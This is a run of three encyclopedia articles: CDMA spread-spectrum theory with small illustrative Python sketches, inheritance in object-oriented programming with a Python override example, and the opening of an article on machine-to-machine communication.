In the US, one of the earliest descriptions of CDMA can be found in the summary report of Project Hartwell on "The Security of Overseas Transport", which was a summer research project carried out at the Massachusetts Institute of Technology from June to August 1950.[5] Further research in the context of jamming and anti-jamming was carried out in 1952 at Lincoln Lab.[6]
In the Soviet Union (USSR), the first work devoted to this subject was published in 1935 by Dmitry Ageev.[7] It was shown that through the use of linear methods, there are three types of signal separation: frequency, time and compensatory.[clarification needed] The technology of CDMA was used in 1957, when the young military radio engineer Leonid Kupriyanovich in Moscow made an experimental model of a wearable automatic mobile phone, called LK-1 by him, with a base station.[8] LK-1 had a weight of 3 kg, a 20–30 km operating distance, and 20–30 hours of battery life.[9][10] The base station, as described by the author, could serve several customers. In 1958, Kupriyanovich made a new experimental "pocket" model of mobile phone, weighing 0.5 kg. To serve more customers, Kupriyanovich proposed a device he called a "correlator".[11][12] In 1958, the USSR also started the development of the "Altai" national civil mobile phone service for cars, based on the Soviet MRT-1327 standard. The phone system weighed 11 kg (24 lb). It was placed in the trunk of the vehicles of high-ranking officials and used a standard handset in the passenger compartment. The main developers of the Altai system were VNIIS (Voronezh Science Research Institute of Communications) and GSPI (State Specialized Project Institute). In 1963 this service started in Moscow, and by 1970 the Altai service was used in 30 cities of the USSR.[13]
CDMA is a spread-spectrum multiple-access technique. A spread-spectrum technique spreads the bandwidth of the data uniformly for the same transmitted power. A spreading code is a pseudo-random code in the time domain that has a narrow ambiguity function in the frequency domain, unlike other narrow pulse codes. In CDMA a locally generated code runs at a much higher rate than the data to be transmitted. Data for transmission is combined by bitwise XOR (exclusive OR) with the faster code. The figure shows how a spread-spectrum signal is generated. The data signal with pulse duration T_b (symbol period) is XORed with the code signal with pulse duration T_c (chip period). (Note: bandwidth is proportional to 1/T, where T = bit time.) Therefore, the bandwidth of the data signal is 1/T_b and the bandwidth of the spread-spectrum signal is 1/T_c. Since T_c is much smaller than T_b, the bandwidth of the spread-spectrum signal is much larger than the bandwidth of the original signal. The ratio T_b/T_c is called the spreading factor or processing gain and determines, to a certain extent, the upper limit of the total number of users supported simultaneously by a base station.[1][2]
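The XOR spreading and despreading step described above can be sketched in a few lines. This is an illustration only; the 8-chip code below is an arbitrary choice, not a code from any real system:

```python
# Spreading sketch: each data bit (duration T_b) is XORed with a faster
# chip code (duration T_c), so one data bit becomes len(code) chips.
# The receiver XORs the same code back to recover the data.

code = [1, 0, 1, 1, 0, 1, 0, 0]   # spreading factor T_b/T_c = 8 (arbitrary code)
data = [1, 0, 1]

def spread(bits, code):
    """Each bit is XORed chip-by-chip with the spreading code."""
    return [b ^ c for b in bits for c in code]

def despread(chips, code):
    """XOR the code back; each block collapses to a constant run of the bit."""
    n = len(code)
    out = []
    for k in range(0, len(chips), n):
        recovered = [x ^ c for x, c in zip(chips[k:k + n], code)]
        out.append(recovered[0])
    return out

tx = spread(data, code)
assert len(tx) == len(data) * len(code)   # bandwidth expanded by the factor 8
assert despread(tx, code) == data         # receiver recovers the original data
```

The factor-of-8 expansion in the chip count is exactly the processing gain T_b/T_c from the paragraph above.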
Each user in a CDMA system uses a different code to modulate their signal. Choosing the codes used to modulate the signal is very important in the performance of CDMA systems. The best performance occurs when there is good separation between the signal of a desired user and the signals of other users. The separation of the signals is made by correlating the received signal with the locally generated code of the desired user. If the signal matches the desired user's code, then the correlation function will be high and the system can extract that signal. If the desired user's code has nothing in common with the signal, the correlation should be as close to zero as possible (thus eliminating the signal); this is referred to as cross-correlation. If the code is correlated with the signal at any time offset other than zero, the correlation should be as close to zero as possible. This is referred to as auto-correlation and is used to reject multi-path interference.[18][19]
An analogy to the problem of multiple access is a room (channel) in which people wish to talk to each other simultaneously. To avoid confusion, people could take turns speaking (time division), speak at different pitches (frequency division), or speak in different languages (code division). CDMA is analogous to the last example, where people speaking the same language can understand each other, but other languages are perceived as noise and rejected. Similarly, in radio CDMA, each group of users is given a shared code. Many codes occupy the same channel, but only users associated with a particular code can communicate.
In general, CDMA belongs to two basic categories: synchronous (orthogonal codes) and asynchronous (pseudorandom codes).
The digital modulation method is analogous to those used in simple radio transceivers. In the analog case, a low-frequency data signal is time-multiplied with a high-frequency pure sine-wave carrier and transmitted. This is effectively a frequency convolution (Wiener–Khinchin theorem) of the two signals, resulting in a carrier with narrow sidebands. In the digital case, the sinusoidal carrier is replaced by Walsh functions. These are binary square waves that form a complete orthonormal set. The data signal is also binary and the time multiplication is achieved with a simple XOR function. This is usually a Gilbert cell mixer in the circuitry.
Synchronous CDMA exploits mathematical properties of orthogonality between vectors representing the data strings. For example, the binary string 1011 is represented by the vector (1, 0, 1, 1). Vectors can be multiplied by taking their dot product, by summing the products of their respective components (for example, if u = (a, b) and v = (c, d), then their dot product u·v = ac + bd). If the dot product is zero, the two vectors are said to be orthogonal to each other. Some properties of the dot product aid understanding of how W-CDMA works. If vectors a and b are orthogonal, then a·b = 0 and:

a·(a + b) = ||a||², since a·a + a·b = ||a||² + 0, and
a·(−a + b) = −||a||², since −a·a + a·b = −||a||² + 0.
Each user in synchronous CDMA uses a code orthogonal to the others' codes to modulate their signal. An example of 4 mutually orthogonal digital signals is shown in the figure below. Orthogonal codes have a cross-correlation equal to zero; in other words, they do not interfere with each other. In the case of IS-95, 64-bit Walsh codes are used to encode the signal to separate different users. Since each of the 64 Walsh codes is orthogonal to all the others, the signals are channelized into 64 orthogonal signals. The following example demonstrates how each user's signal can be encoded and decoded.
Start with a set of vectors that are mutually orthogonal. (Although mutual orthogonality is the only condition, these vectors are usually constructed for ease of decoding, for example columns or rows from Walsh matrices.) An example of orthogonal functions is shown in the adjacent picture. These vectors will be assigned to individual users and are called the code, chip code, or chipping code. In the interest of brevity, the rest of this example uses codes v with only two bits.
Each user is associated with a different code, say v. A 1 bit is represented by transmitting a positive code v, and a 0 bit is represented by a negative code −v. For example, if v = (v0, v1) = (1, −1) and the data that the user wishes to transmit is (1, 0, 1, 1), then the transmitted symbols would be (v, −v, v, v) = (1, −1, −1, 1, 1, −1, 1, −1).
For the purposes of this article, we call this constructed vector thetransmitted vector.
Each sender has a different, unique vectorvchosen from that set, but the construction method of the transmitted vector is identical.
Now, due to physical properties of interference, if two signals at a point are in phase, they add to give twice the amplitude of each signal, but if they are out of phase, they subtract and give a signal that is the difference of the amplitudes. Digitally, this behaviour can be modelled by the addition of the transmission vectors, component by component.
If sender0 has code (1, −1) and data (1, 0, 1, 1), and sender1 has code (1, 1) and data (0, 0, 1, 1), and both senders transmit simultaneously, then this table describes the coding steps:
Because signal0 and signal1 are transmitted at the same time into the air, they add to produce the raw signal
This raw signal is called an interference pattern. The receiver then extracts an intelligible signal for any known sender by combining the sender's code with the interference pattern. The following table explains how this works and shows that the signals do not interfere with one another:
Further, after decoding, all values greater than 0 are interpreted as 1, while all values less than zero are interpreted as 0. For example, after decoding, data0 is (2, −2, 2, 2), but the receiver interprets this as (1, 0, 1, 1). Values of exactly 0 mean that the sender did not transmit any data, as in the following example:
Assume signal0 = (1, −1, −1, 1, 1, −1, 1, −1) is transmitted alone. The following table shows the decode at the receiver:
When the receiver attempts to decode the signal using sender1's code, the data is all zeros; therefore the cross-correlation is equal to zero and it is clear that sender1 did not transmit any data.
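The whole worked example above (encode with ±code, add the signals in the air, decode by per-symbol correlation) can be reproduced in a short sketch. The codes and data are exactly those of the example; the helper names are ours:

```python
# Synchronous-CDMA sketch of the example above: sender0 uses code (1, -1),
# sender1 uses (1, 1); bit 1 is sent as +v, bit 0 as -v, and the channel
# simply adds the transmitted vectors component by component.

code0, code1 = [1, -1], [1, 1]
data0, data1 = [1, 0, 1, 1], [0, 0, 1, 1]

def encode(code, bits):
    out = []
    for b in bits:
        sign = 1 if b == 1 else -1
        out.extend(sign * c for c in code)
    return out

signal0 = encode(code0, data0)   # (1, -1, -1, 1, 1, -1, 1, -1), as in the text
signal1 = encode(code1, data1)
received = [a + b for a, b in zip(signal0, signal1)]   # interference pattern

def decode(code, rx):
    """Correlate each symbol-length block with the code; the sign gives the bit,
    and a zero correlation means the sender transmitted nothing."""
    n = len(code)
    bits = []
    for k in range(0, len(rx), n):
        corr = sum(c * x for c, x in zip(code, rx[k:k + n]))
        bits.append(1 if corr > 0 else 0 if corr < 0 else None)
    return bits

assert decode(code0, received) == data0   # sender0's data recovered
assert decode(code1, received) == data1   # sender1's data recovered
# Decoding signal0 alone with sender1's code yields zero correlations:
assert decode(code1, signal0) == [None, None, None, None]
```

The final assertion is the "all zeros" case from the last paragraph: sender1's code is orthogonal to sender0's signal, so the receiver concludes sender1 sent nothing.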
When mobile-to-base links cannot be precisely coordinated, particularly due to the mobility of the handsets, a different approach is required. Since it is not mathematically possible to create signature sequences that are both orthogonal for arbitrarily random starting points and which make full use of the code space, unique "pseudo-random" or "pseudo-noise" sequences called spreading sequences are used in asynchronous CDMA systems. A spreading sequence is a binary sequence that appears random but can be reproduced in a deterministic manner by intended receivers. These spreading sequences are used to encode and decode a user's signal in asynchronous CDMA in the same manner as the orthogonal codes in synchronous CDMA (shown in the example above). These spreading sequences are statistically uncorrelated, and the sum of a large number of spreading sequences results in multiple access interference (MAI) that is approximated by a Gaussian noise process (following the central limit theorem in statistics). Gold codes are an example of a spreading sequence suitable for this purpose, as there is low correlation between the codes. If all of the users are received with the same power level, then the variance (e.g., the noise power) of the MAI increases in direct proportion to the number of users. In other words, unlike synchronous CDMA, the signals of other users will appear as noise to the signal of interest and interfere slightly with the desired signal in proportion to the number of users.
All forms of CDMA use the spread-spectrum spreading factor to allow receivers to partially discriminate against unwanted signals. Signals encoded with the specified spreading sequences are received, while signals with different sequences (or the same sequences but different timing offsets) appear as wideband noise reduced by the spreading factor.
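Pseudo-noise sequences of the kind used in asynchronous CDMA are classically produced by linear-feedback shift registers. The following is a minimal sketch of a Fibonacci LFSR producing a maximal-length (m-)sequence; the tap choice (5, 3) corresponds to a primitive degree-5 trinomial, and real Gold codes are built by combining pairs of such m-sequences, which is not shown here:

```python
# Minimal Fibonacci LFSR generating a pseudo-noise (maximal-length) sequence.
# With taps (5, 3) the 5-bit register cycles through all 2^5 - 1 = 31
# non-zero states, so the output has period 31 and is nearly balanced.

def lfsr(seed, taps, n):
    state = list(seed)          # state[0] is stage 1, state[-1] is stage 5
    out = []
    for _ in range(n):
        out.append(state[-1])   # output the last stage
        fb = 0
        for t in taps:          # feedback = XOR of the tapped stages
            fb ^= state[t - 1]
        state = [fb] + state[:-1]
    return out

seq = lfsr([1, 0, 0, 0, 0], (5, 3), 62)
assert seq[:31] == seq[31:]        # the sequence repeats with period 31
assert seq[:31].count(1) == 16     # nearly balanced: 16 ones, 15 zeros
```

The near-balance and sharp autocorrelation of such sequences are what make them "appear random" to receivers that do not know the generator, as described above.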
Since each user generates MAI, controlling the signal strength is an important issue with CDMA transmitters. A CDM (synchronous CDMA), TDMA, or FDMA receiver can in theory completely reject arbitrarily strong signals using different codes, time slots or frequency channels due to the orthogonality of these systems. This is not true for asynchronous CDMA; rejection of unwanted signals is only partial. If any or all of the unwanted signals are much stronger than the desired signal, they will overwhelm it. This leads to a general requirement in any asynchronous CDMA system to approximately match the various signal power levels as seen at the receiver. In CDMA cellular, the base station uses a fast closed-loop power-control scheme to tightly control each mobile's transmit power.
In 2019, schemes to precisely estimate the required code length as a function of Doppler and delay characteristics were developed.[20] Soon after, machine-learning-based techniques that generate sequences of a desired length and desired spreading properties were published as well. These are highly competitive with the classic Gold and Welch sequences, but they are not generated by linear-feedback shift registers and must instead be stored in lookup tables.
In theory CDMA, TDMA and FDMA have exactly the same spectral efficiency, but, in practice, each has its own challenges – power control in the case of CDMA, timing in the case of TDMA, and frequency generation/filtering in the case of FDMA.
TDMA systems must carefully synchronize the transmission times of all the users to ensure that they are received in the correct time slot and do not cause interference. Since this cannot be perfectly controlled in a mobile environment, each time slot must have a guard time, which reduces the probability that users will interfere, but decreases the spectral efficiency.
Similarly, FDMA systems must use a guard band between adjacent channels, due to the unpredictableDoppler shiftof the signal spectrum because of user mobility. The guard bands will reduce the probability that adjacent channels will interfere, but decrease the utilization of the spectrum.
Asynchronous CDMA offers a key advantage in the flexible allocation of resources, i.e. the allocation of spreading sequences to active users. In the case of CDM (synchronous CDMA), TDMA, and FDMA the number of simultaneous orthogonal codes, time slots, and frequency slots respectively is fixed, hence the capacity in terms of the number of simultaneous users is limited. There are a fixed number of orthogonal codes, time slots or frequency bands that can be allocated for CDM, TDMA, and FDMA systems, which remain underutilized due to the bursty nature of telephony and packetized data transmissions. There is no strict limit to the number of users that can be supported in an asynchronous CDMA system, only a practical limit governed by the desired bit error probability, since the SIR (signal-to-interference ratio) varies inversely with the number of users. In a bursty traffic environment like mobile telephony, the advantage afforded by asynchronous CDMA is that the performance (bit error rate) is allowed to fluctuate randomly, with an average value determined by the number of users times the percentage of utilization. Suppose there are 2N users that only talk half of the time; then 2N users can be accommodated with the same average bit error probability as N users that talk all of the time. The key difference here is that the bit error probability for N users talking all of the time is constant, whereas it is a random quantity (with the same mean) for 2N users talking half of the time.
In other words, asynchronous CDMA is ideally suited to a mobile network where large numbers of transmitters each generate a relatively small amount of traffic at irregular intervals. CDM (synchronous CDMA), TDMA, and FDMA systems cannot recover the underutilized resources inherent to bursty traffic due to the fixed number oforthogonalcodes, time slots or frequency channels that can be assigned to individual transmitters. For instance, if there areNtime slots in a TDMA system and 2Nusers that talk half of the time, then half of the time there will be more thanNusers needing to use more thanNtime slots. Furthermore, it would require significant overhead to continually allocate and deallocate the orthogonal-code, time-slot or frequency-channel resources. By comparison, asynchronous CDMA transmitters simply send when they have something to say and go off the air when they do not, keeping the same signature sequence as long as they are connected to the system.
Most modulation schemes try to minimize the bandwidth of this signal since bandwidth is a limited resource. However, spread-spectrum techniques use a transmission bandwidth that is several orders of magnitude greater than the minimum required signal bandwidth. One of the initial reasons for doing this was military applications including guidance and communication systems. These systems were designed using spread spectrum because of its security and resistance to jamming. Asynchronous CDMA has some level of privacy built in because the signal is spread using a pseudo-random code; this code makes the spread-spectrum signals appear random or have noise-like properties. A receiver cannot demodulate this transmission without knowledge of the pseudo-random sequence used to encode the data. CDMA is also resistant to jamming. A jamming signal only has a finite amount of power available to jam the signal. The jammer can either spread its energy over the entire bandwidth of the signal or jam only part of the entire signal.[18][19]
CDMA can also effectively reject narrow-band interference. Since narrow-band interference affects only a small portion of the spread-spectrum signal, it can easily be removed through notch filtering without much loss of information.Convolution encodingandinterleavingcan be used to assist in recovering this lost data. CDMA signals are also resistant to multipath fading. Since the spread-spectrum signal occupies a large bandwidth, only a small portion of this will undergo fading due to multipath at any given time. Like the narrow-band interference, this will result in only a small loss of data and can be overcome.
Another reason CDMA is resistant to multipath interference is because the delayed versions of the transmitted pseudo-random codes will have poor correlation with the original pseudo-random code, and will thus appear as another user, which is ignored at the receiver. In other words, as long as the multipath channel induces at least one chip of delay, the multipath signals will arrive at the receiver such that they are shifted in time by at least one chip from the intended signal. The correlation properties of the pseudo-random codes are such that this slight delay causes the multipath to appear uncorrelated with the intended signal, and it is thus ignored.
Some CDMA devices use arake receiver, which exploits multipath delay components to improve the performance of the system. A rake receiver combines the information from several correlators, each one tuned to a different path delay, producing a stronger version of the signal than a simple receiver with a single correlation tuned to the path delay of the strongest signal.[1][2]
Frequency reuse is the ability to reuse the same radio channel frequency at other cell sites within a cellular system. In the FDMA and TDMA systems, frequency planning is an important consideration. The frequencies used in different cells must be planned carefully to ensure signals from different cells do not interfere with each other. In a CDMA system, the same frequency can be used in every cell, because channelization is done using the pseudo-random codes. Reusing the same frequency in every cell eliminates the need for frequency planning in a CDMA system; however, planning of the different pseudo-random sequences must be done to ensure that the received signal from one cell does not correlate with the signal from a nearby cell.[1]
Since adjacent cells use the same frequencies, CDMA systems have the ability to perform soft hand-offs. Soft hand-offs allow the mobile telephone to communicate simultaneously with two or more cells. The best signal quality is selected until the hand-off is complete. This is different from hard hand-offs utilized in other cellular systems. In a hard-hand-off situation, as the mobile telephone approaches a hand-off, signal strength may vary abruptly. In contrast, CDMA systems use the soft hand-off, which is undetectable and provides a more reliable and higher-quality signal.[2]
A novel collaborative multi-user transmission and detection scheme called collaborative CDMA[21] has been investigated for the uplink that exploits the differences between users' fading channel signatures to increase the user capacity well beyond the spreading length in the MAI-limited environment. The authors show that it is possible to achieve this increase at a low complexity and high bit error rate performance in flat fading channels, which is a major research challenge for overloaded CDMA systems. In this approach, instead of using one sequence per user as in conventional CDMA, the authors group a small number of users to share the same spreading sequence and enable group spreading and despreading operations. The new collaborative multi-user receiver consists of two stages: a group multi-user detection (MUD) stage to suppress the MAI between the groups and a low-complexity maximum-likelihood detection stage to recover jointly the co-spread users' data using a minimal Euclidean-distance measure and users' channel-gain coefficients. An enhanced CDMA version known as interleave-division multiple access (IDMA) uses orthogonal interleaving as the only means of user separation in place of the signature sequences used in CDMA systems.
https://en.wikipedia.org/wiki/Code_division_multiple_access
In object-oriented programming, inheritance is the mechanism of basing an object or class upon another object (prototype-based inheritance) or class (class-based inheritance), retaining similar implementation. It is also defined as deriving new classes (subclasses) from existing ones (such as a super class or base class) and then forming them into a hierarchy of classes. In most class-based object-oriented languages like C++, an object created through inheritance, a "child object", acquires all the properties and behaviors of the "parent object", with the exception of: constructors, destructors, overloaded operators and friend functions of the base class. Inheritance allows programmers to create classes that are built upon existing classes,[1] to specify a new implementation while maintaining the same behaviors (realizing an interface), to reuse code and to independently extend original software via public classes and interfaces. The relationships of objects or classes through inheritance give rise to a directed acyclic graph.
An inherited class is called a subclass of its parent class or super class. The term inheritance is loosely used for both class-based and prototype-based programming, but in narrow use the term is reserved for class-based programming (one class inherits from another), with the corresponding technique in prototype-based programming being instead called delegation (one object delegates to another). Class-modifying inheritance patterns can be pre-defined according to simple network interface parameters such that inter-language compatibility is preserved.[2][3]
Inheritance should not be confused with subtyping.[4][5] In some languages inheritance and subtyping agree,[a] whereas in others they differ; in general, subtyping establishes an is-a relationship, whereas inheritance only reuses implementation and establishes a syntactic relationship, not necessarily a semantic relationship (inheritance does not ensure behavioral subtyping). To distinguish these concepts, subtyping is sometimes referred to as interface inheritance (without acknowledging that the specialization of type variables also induces a subtyping relation), whereas inheritance as defined here is known as implementation inheritance or code inheritance.[6] Still, inheritance is a commonly used mechanism for establishing subtype relationships.[7]
Inheritance is contrasted with object composition, where one object contains another object (or objects of one class contain objects of another class); see composition over inheritance. In contrast to subtyping's is-a relationship, composition implements a has-a relationship.
Mathematically speaking, inheritance in any system of classes induces a strict partial order on the set of classes in that system.
In 1966, Tony Hoare presented some remarks on records, and in particular the idea of record subclasses, record types with common properties but discriminated by a variant tag and having fields private to the variant.[8] Influenced by this, in 1967 Ole-Johan Dahl and Kristen Nygaard presented a design that allowed specifying objects that belonged to different classes but had common properties. The common properties were collected in a superclass, and each superclass could itself potentially have a superclass. The values of a subclass were thus compound objects, consisting of some number of prefix parts belonging to various superclasses, plus a main part belonging to the subclass. These parts were all concatenated together.[9] The attributes of a compound object would be accessible by dot notation. This idea was first adopted in the Simula 67 programming language.[10] The idea then spread to Smalltalk, C++, Java, Python, and many other languages.
There are various types of inheritance, based on paradigm and specific language.[11]
"Multiple inheritance... was widely supposed to be very difficult to implement efficiently. For example, in a summary of C++ in his book on Objective C, Brad Cox actually claimed that adding multiple inheritance to C++ was impossible. Thus, multiple inheritance seemed more of a challenge. Since I had considered multiple inheritance as early as 1982 and found a simple and efficient implementation technique in 1984, I couldn't resist the challenge. I suspect this to be the only case in which fashion affected the sequence of events."[12]
Subclasses, derived classes, heir classes, or child classes are modular derivative classes that inherit one or more language entities from one or more other classes (called superclasses, base classes, or parent classes). The semantics of class inheritance vary from language to language, but commonly the subclass automatically inherits the instance variables and member functions of its superclasses.
The general form of defining a derived class is:[13]
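The listing referred to here is not reproduced in this copy. As a minimal sketch in Python (the class names are placeholders, not taken from the cited source), the general form is a class that names its base class and thereby inherits its members:

```python
# Minimal sketch of the general form of a derived class;
# class names are placeholders, not from the cited source.
class SuperClass:
    def greet(self):
        return "hello from SuperClass"

class SubClass(SuperClass):      # SubClass derives from SuperClass
    pass                         # adds nothing; inherits everything

obj = SubClass()
print(obj.greet())               # inherited member function is available
```

In class-based languages with explicit access control (such as C++), the derivation additionally names a visibility (public, protected, or private), which governs how inherited members are exposed.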
Some languages also support the inheritance of other constructs. For example, in Eiffel, contracts that define the specification of a class are also inherited by heirs. The superclass establishes a common interface and foundational functionality, which specialized subclasses can inherit, modify, and supplement. The software inherited by a subclass is considered reused in the subclass. A reference to an instance of a class may actually be referring to one of its subclasses. The actual class of the object being referenced is impossible to predict at compile-time. A uniform interface is used to invoke the member functions of objects of a number of different classes. Subclasses may replace superclass functions with entirely new functions that must share the same method signature.
In some languages a class may be declared as non-subclassable by adding certain class modifiers to the class declaration. Examples include the final keyword in Java and C++11 onwards or the sealed keyword in C#. Such modifiers are added to the class declaration before the class keyword and the class identifier declaration. Such non-subclassable classes restrict reusability, particularly when developers only have access to precompiled binaries and not source code.
A non-subclassable class has no subclasses, so it can be easily deduced at compile time that references or pointers to objects of that class are actually referencing instances of that class and not instances of subclasses (they do not exist) or instances of superclasses (upcasting a reference type violates the type system). Because the exact type of the object being referenced is known before execution, early binding (also called static dispatch) can be used instead of late binding (also called dynamic dispatch), which requires one or more virtual method table lookups depending on whether multiple inheritance or only single inheritance is supported in the programming language that is being used.
Just as classes may be non-subclassable, method declarations may contain method modifiers that prevent the method from being overridden (i.e. replaced with a new function with the same name and type signature in a subclass). A private method is un-overridable simply because it is not accessible by classes other than the class it is a member function of (this is not true for C++, though). A final method in Java, a sealed method in C# or a frozen feature in Eiffel cannot be overridden.
If a superclass method is a virtual method, then invocations of the superclass method will be dynamically dispatched. Some languages require that a method be specifically declared as virtual (e.g. C++), and in others, all methods are virtual (e.g. Java). An invocation of a non-virtual method will always be statically dispatched (i.e. the address of the function call is determined at compile-time). Static dispatch is faster than dynamic dispatch and allows optimizations such as inline expansion.
The following table shows which variables and functions are inherited depending on the visibility given when deriving the class, using the terminology established by C++.[14]
Inheritance is used to relate two or more classes to each other.
Many object-oriented programming languages permit a class or object to replace the implementation of an aspect (typically a behavior) that it has inherited. This process is called overriding. Overriding introduces a complication: which version of the behavior does an instance of the inherited class use, the one that is part of its own class, or the one from the parent (base) class? The answer varies between programming languages, and some languages provide the ability to indicate that a particular behavior is not to be overridden and should behave as defined by the base class. For instance, in C#, the base method or property can only be overridden in a subclass if it is marked with the virtual, abstract, or override modifier, while in programming languages such as Java, different methods can be called to override other methods.[15] An alternative to overriding is hiding the inherited code.
Implementation inheritance is the mechanism whereby a subclass re-uses code in a base class. By default the subclass retains all of the operations of the base class, but the subclass may override some or all operations, replacing the base-class implementation with its own.
In the following Python example, subclasses SquareSumComputer and CubeSumComputer override the transform() method of the base class SumComputer. The base class comprises operations to compute the sum of the squares between two integers. The subclass re-uses all of the functionality of the base class with the exception of the operation that transforms a number into its square, replacing it with an operation that transforms a number into its square and cube respectively. The subclasses therefore compute the sum of the squares/cubes between two integers.
Below is an example in Python.
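The listing itself is missing from this copy; the following is a reconstruction from the description above, so details such as the constructor signature and the half-open summation range are assumptions.

```python
# Reconstruction (from the description above) of the SumComputer example;
# the constructor signature and the half-open range are assumptions.
class SumComputer:
    """Sums transform(x) over the integers in [a, b)."""
    def __init__(self, a, b):
        self.a = a
        self.b = b

    def transform(self, x):
        return x * x                 # base class: sum of squares

    def compute(self):
        return sum(self.transform(x) for x in range(self.a, self.b))

class SquareSumComputer(SumComputer):
    def transform(self, x):          # overrides: square, as in the base
        return x * x

class CubeSumComputer(SumComputer):
    def transform(self, x):          # overrides: cube
        return x * x * x

print(SquareSumComputer(1, 4).compute())  # 1 + 4 + 9 = 14
print(CubeSumComputer(1, 4).compute())    # 1 + 8 + 27 = 36
```

Only transform() differs between the classes; the looping and summing machinery in compute() is inherited unchanged, which is exactly the code reuse that implementation inheritance provides.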
In most quarters, class inheritance for the sole purpose of code reuse has fallen out of favor.[citation needed] The primary concern is that implementation inheritance does not provide any assurance of polymorphic substitutability: an instance of the reusing class cannot necessarily be substituted for an instance of the inherited class. An alternative technique, explicit delegation, requires more programming effort, but avoids the substitutability issue.[citation needed] In C++ private inheritance can be used as a form of implementation inheritance without substitutability. Whereas public inheritance represents an "is-a" relationship and delegation represents a "has-a" relationship, private (and protected) inheritance can be thought of as an "is implemented in terms of" relationship.[16]
Another frequent use of inheritance is to guarantee that classes maintain a certain common interface; that is, they implement the same methods. The parent class can be a combination of implemented operations and operations that are to be implemented in the child classes. Often, there is no interface change between the supertype and subtype: the child implements the behavior described instead of its parent class.[17]
Inheritance is similar to but distinct from subtyping.[4] Subtyping enables a given type to be substituted for another type or abstraction and is said to establish an is-a relationship between the subtype and some existing abstraction, either implicitly or explicitly, depending on language support. The relationship can be expressed explicitly via inheritance in languages that support inheritance as a subtyping mechanism. For example, C++ code that declares class B as a public subclass of class A establishes an explicit inheritance relationship in which B is both a subclass and a subtype of A, so a B can be used as an A wherever an A is expected (via a reference, a pointer or the object itself).
In programming languages that do not support inheritance as a subtyping mechanism, the relationship between a base class and a derived class is only a relationship between implementations (a mechanism for code reuse), as compared to a relationship between types. Inheritance, even in programming languages that support inheritance as a subtyping mechanism, does not necessarily entail behavioral subtyping. It is entirely possible to derive a class whose object will behave incorrectly when used in a context where the parent class is expected; see the Liskov substitution principle.[18] (Compare connotation/denotation.) In some OOP languages, the notions of code reuse and subtyping coincide because the only way to declare a subtype is to define a new class that inherits the implementation of another.
Using inheritance extensively in designing a program imposes certain constraints.
For example, consider a class Person that contains a person's name, date of birth, address and phone number. We can define a subclass of Person called Student that contains the person's grade point average and classes taken, and another subclass of Person called Employee that contains the person's job title, employer, and salary.
In defining this inheritance hierarchy we have already defined certain restrictions, not all of which are desirable:
The composite reuse principle is an alternative to inheritance. This technique supports polymorphism and code reuse by separating behaviors from the primary class hierarchy and including specific behavior classes as required in any business domain class. This approach avoids the static nature of a class hierarchy by allowing behavior modifications at run time and allows one class to implement behaviors buffet-style, instead of being restricted to the behaviors of its ancestor classes.
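As a sketch of the idea (the class and method names below are invented for illustration, not from any cited source), behaviors can be held as components of the domain class and swapped at run time:

```python
# Illustrative sketch of the composite reuse principle: behaviors live in
# their own classes and are plugged into a domain class at run time.
# All class and method names here are invented for illustration.
class QuackBehavior:
    def sound(self):
        return "quack"

class SqueakBehavior:
    def sound(self):
        return "squeak"

class Duck:
    def __init__(self, sound_behavior):
        self.sound_behavior = sound_behavior   # has-a, not is-a

    def make_sound(self):
        return self.sound_behavior.sound()     # delegate to the component

d = Duck(QuackBehavior())
print(d.make_sound())                  # quack
d.sound_behavior = SqueakBehavior()    # behavior swapped at run time
print(d.make_sound())                  # squeak
```

With inheritance, changing the sound would require a new subclass fixed at compile time; with composition, the same Duck object simply holds a different behavior component.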
Implementation inheritance has been controversial among programmers and theoreticians of object-oriented programming since at least the 1990s. Among the critics are the authors of Design Patterns, who advocate instead for interface inheritance, and favor composition over inheritance. For example, the decorator pattern (as mentioned above) has been proposed to overcome the static nature of inheritance between classes. As a more fundamental solution to the same problem, role-oriented programming introduces a distinct relationship, played-by, combining properties of inheritance and composition into a new concept.[citation needed]
According to Allen Holub, the main problem with implementation inheritance is that it introduces unnecessary coupling in the form of the "fragile base class problem":[6] modifications to the base class implementation can cause inadvertent behavioral changes in subclasses. Using interfaces avoids this problem because no implementation is shared, only the API.[19] Another way of stating this is that "inheritance breaks encapsulation".[20] The problem surfaces clearly in open object-oriented systems such as frameworks, where client code is expected to inherit from system-supplied classes and then be substituted for the system's classes in its algorithms.[6]
Reportedly, Java inventor James Gosling has spoken against implementation inheritance, stating that he would not include it if he were to redesign Java.[19] Language designs that decouple inheritance from subtyping (interface inheritance) appeared as early as 1990;[21] a modern example of this is the Go programming language.
Complex inheritance, or inheritance used within an insufficiently mature design, may lead to the yo-yo problem. When inheritance was used as a primary approach to structure programs in the late 1990s, developers tended to break code into more layers of inheritance as the system functionality grew. If a development team combined multiple layers of inheritance with the single responsibility principle, this resulted in many very thin layers of code, with many layers consisting of only one or two lines of actual code.[citation needed] Too many layers make debugging a significant challenge, as it becomes hard to determine which layer needs to be debugged.
Another issue with inheritance is that subclasses must be defined in code, which means that program users cannot add new subclasses at runtime. Other design patterns (such as Entity–component–system) allow program users to define variations of an entity at runtime.
https://en.wikipedia.org/wiki/Implementation_inheritance
Machine to machine (M2M) is direct communication between devices using any communications channel, including wired and wireless.[1][2] Machine to machine communication can include industrial instrumentation, enabling a sensor or meter to communicate the information it records (such as temperature, inventory level, etc.) to application software that can use it (for example, adjusting an industrial process based on temperature or placing orders to replenish inventory).[3] Such communication was originally accomplished by having a remote network of machines relay information back to a central hub for analysis, which would then be rerouted into a system like a personal computer.[4]
More recent machine to machine communication has changed into a system of networks that transmits data to personal appliances. The expansion of IP networks around the world has made machine to machine communication quicker and easier while using less power.[5] These networks also allow new business opportunities for consumers and suppliers.[6]
Wired communication machines have been using signaling to exchange information since the early 20th century. Machine to machine has taken more sophisticated forms since the advent of computer networking automation[7] and predates cellular communication. It has been utilized in applications such as telemetry, industrial automation, and SCADA.
Machine to machine devices that combined telephony and computing were first conceptualized by Theodore Paraskevakos while working on his Caller ID system in 1968, later patented in the U.S. in 1973. This system, similar to but distinct from the panel call indicator of the 1920s and automatic number identification of the 1940s, which communicated telephone numbers to machines, was the predecessor to what is now caller ID, which communicates numbers to people.
